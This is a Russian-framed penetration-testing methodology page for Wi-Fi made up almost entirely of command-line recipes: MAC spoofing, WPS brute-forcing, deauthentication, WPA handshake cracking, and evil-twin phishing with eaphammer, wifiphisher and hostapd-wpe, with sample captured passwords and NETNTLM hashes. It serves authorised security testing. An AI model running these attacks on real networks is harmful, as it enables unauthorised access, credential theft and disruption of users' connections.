Wi‑Fi (раздел)
:::tip Формат страницы
Порядок действий описан по‑русски. В методике сохранены заголовки (частично локализованы типовые термины), таблицы, иллюстрации и блоки кода: команды и параметры на английском, без перевода синтаксиса.
:::
Порядок действий
- Подтвердите разрешение на активные действия и уведомите мониторинг (SOC), если требуется.
- Выполните сканирование и перечисление в согласованных пределах.
- Углубляйтесь в сервисы по мере находок; фиксируйте версии и конфигурации.
- Синтаксис команд в методике не локализуется.
Методика
MAC address access control
# Option 1
sudo macchanger -m <XX:XX:XX:XX:XX:XX> <IF>
# Option 2
sudo ifconfig <IF> down
sudo ifconfig <IF> hw ether <XX:XX:XX:XX:XX:XX>
sudo ifconfig <IF> up
Authentication tests
WPS Attacks
sudo reaver -i <MON_IF> -b <AP_MAC> -vvNwf [-K {1|2|3}] -c <CHANNEL>
sudo bully <MON_IF> -b <AP_MAC> -c <CHANNEL> -S -F -B -v 3
sudo reaver -i <MON_IF> -b <AP_MAC> -vvNwf -c <CHANNEL> -p <FOUND_IP>
Capture and Handshake cracking
Wired Equivalent Privacy (WEP)
besside-ng -c <CHANNEL> -b <BSSID_MAC> <MON_IF>
Wi-Fi Protected Access (WPA2-PSK)
airodump-ng --bssid <TARGET_BSSID> -c <CHANNEL> --write <OUTPUT_CAP> <MON_IF>
# The whole network
aireplay-ng -0 <NUM_DEAUTH_PKTS> -a <TARGET_BSSID> <MON_IF>
# A client
aireplay-ng -0 100 -a <TARGET_BSSID> -c <CLIENT_MAC> <MON_IF>
# Aircrack
aircrack-ng -w <WORDLIST> -b <TARGET_BSSID> <FILE_CAP>
# Hashcat
hcxpcapngtool $(find . -name '*.cap') -o <HANDSHAKES.TXT>
hashcat -m 22000 <HANDSHAKES.TXT> <WORDLIST.TXT>
crunch <MIN_LENGTH> <MAX_LENGTH> <CHARACTERS> | aircrack-ng -w - -b <TARGET_BSSID> <FILE_CAP>
Phishing
WPA-PSK
# The obtained file is: loot/wpa_handshake_capture*.hccapx
sudo ./eaphammer -i <IF> --channel <CHANNEL> --auth wpa-psk --essid <TARGET_ESSID> --ssid <TARGET_BSSID> --creds
./hcxhash2cap --hccapx=<HANDSHAKE.hccapx> -c <OUTPUT.cap>
./hcxpcapngtool <OUTPUT.cap> -o <HASH.TXT>
hashcat -a 0 -m 22000 <HASH.TXT> <WORDLIST.TXT>
sudo wifiphisher
[...]
[*] POST request from 10.0.0.61 with wfphshr-wpa-password=password1234
WIFI-Enterprise
Eaphammer - Kali
git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer
sudo ./kali-setup
# Generate the certificate using the details of the target's legitimate certificate so that it appears more trustworthy.
sudo python3 eaphammer --cert-wizard
sudo python3 eaphammer -i <IF> --channel <CHANNEL> --auth wpa-eap --essid <VICTIMS_SSID> --creds
[...]
# Mobile
username: pepe
password: palotes
[...]
# Windows
domain\username: pepe
username: pepe
challenge: c9:fa:47:6b:34:ca:b4:ea
response: 25:44:19:55:4f:a1:9f:b5:68:00:58:67:e3:58:00:ed:6f:0d:3d:6f:b2:7d:63:ab
jtr NETNTLM: pepe:$NETNTLM$c9fa476b34cab4ea$254419554fa19fb568005867e35800ed6f0d3d6fb27d63ab
hashcat NETNTLM: pepe::::254419554fa19fb568005867e35800ed6f0d3d6fb27d63ab:c9fa476b34cab4ea
Hostapd-wpe (Pineapple v2.1.0)
# Installation
wget https://github.com/jekkos/hostapd-wpe-openwrt/releases/download/2/hostapd-common_2019-08-08-ca8c2bd2-4_mips_24kc.ipk
wget https://github.com/jekkos/hostapd-wpe-openwrt/releases/download/2/hostapd-wpe_git-2_mips_24kc.ipk
scp hostapd-common_2019-08-08-ca8c2bd2-4_mips_24kc.ipk root@<PINEAPPLE_IP>:/tmp/
scp hostapd-wpe_git-2_mips_24kc.ipk root@<PINEAPPLE_IP>:/tmp/
opkg install /tmp/hostapd-common_2019-08-08-ca8c2bd2-4_mips_24kc.ipk
opkg install /tmp/hostapd-wpe_git-2_mips_24kc.ipk
opkg update && opkg install coreutils-nohup
# Configuration
# By default it doesn't show the challenge/response, so the following lines need to be added
echo "eap_server=1" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "eap_fast_a_id=101112131415161718191a1b1c1d1e1f" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "eap_fast_a_id_info=hostapd-wpe" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "eap_fast_prov=3" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "ieee8021x=1" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "pac_key_lifetime=604800" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "pac_key_refresh_time=86400" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "pac_opaque_encr_key=000102030405060708090a0b0c0d0e0f" >> /etc/hostapd-wpe/hostapd-wpe.conf
sed -i 's/^ctrl_interface=\/var\/run\/hostapd$/&-wpe/' /etc/hostapd-wpe/hostapd-wpe.conf
sudo vim /etc/hostapd-wpe/hostapd-wpe.conf
[...]
# Interface - Probably wlan0 for 802.11, eth0 for wired
interface=<WIRELESS_IF>
[...]
# 802.11 Options
ssid=<SSID_NAME>
channel=<VICTIM_SSID_CHANNEL>
aireplay-ng -0 <#PACKETS_TO_SEND> -a <AP_BSSID> <IF>
sudo hostapd-wpe -i <IF> -k -s /etc/hostapd-wpe/hostapd-wpe.conf
[...]
mschapv2: Thu Jun 9 07:04:16 2022
username: pepito
challenge: 35:0a:18:49:63:83:ee:76
response: fc:65:5a:02:73:9f:89:a5:95:e5:8e:8f:4b:1b:72:0e:9e:d1:04:03:ee:b5:bd:ea
jtr NETNTLM: pepito:$NETNTLM$350a18496383ee76$fc655a02739f89a595e58e8f4b1b720e9ed10403eeb5bdea
hashcat NETNTLM: pepito::::fc655a02739f89a595e58e8f4b1b720e9ed10403eeb5bdea:350a18496383ee76
hashcat -m 5500 <HASHCAT_NETNTLM_FILE> <WORDLIST>
Simple Radius AP with Internet
Installation
sudo apt install hostapd-wpe hostapd dnsmasq iptables-persistent -y
interface=wlan0
listen-address=127.0.0.1
dhcp-range=10.0.0.3,10.0.0.20,255.255.255.0,12h
server=8.8.8.8
server=8.8.4.4
DNSStubListener=no
* PEAP,TTLS,TLS,FAST
"test" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "test" [2]
"user" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "password" [2]
echo net.ipv4.ip_forward=1 | sudo tee -a /etc/sysctl.conf
sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT
sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
Execution
sudo ifconfig wlan0 up 10.0.0.1 netmask 255.255.255.0
sudo systemctl restart dnsmasq
sudo hostapd -i wlan0 /etc/hostapd-wpe/hostapd-wpe.conf